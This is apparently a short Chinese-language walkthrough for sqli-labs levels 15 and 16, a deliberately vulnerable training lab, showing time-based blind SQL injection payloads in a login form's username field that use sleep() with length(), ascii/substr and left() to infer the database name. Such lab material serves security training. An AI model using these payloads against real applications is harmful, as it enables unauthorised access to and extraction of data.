环境sqli-labs
less 15
1、首先我们抓包
2、测试注入
在 username 输入 1' or 1=1#
在 password 输入 任意
所以用单引号闭合
3、构造语句
uname=admin' and (select (if(length(database())>=8,sleep(5),null)))-- &passwd=2&submit=Submit
如果数据库的长度大于等于8多停留5秒,如果小于8什么都不操作
uname=admin' and If(ascii(substr(database(),1,1))=115,sleep(1),sleep(5))#&passwd=11&submit=Submit
如果第一位是‘s’是多停留1秒,如果不是多停留5秒
uname=admin'and If(left(database(),1)='s',1,sleep(5))#&passwd=11&submit=Submit
less 16
闭合是双引号和小括号(")),其他都一样
禁止非法,后果自负
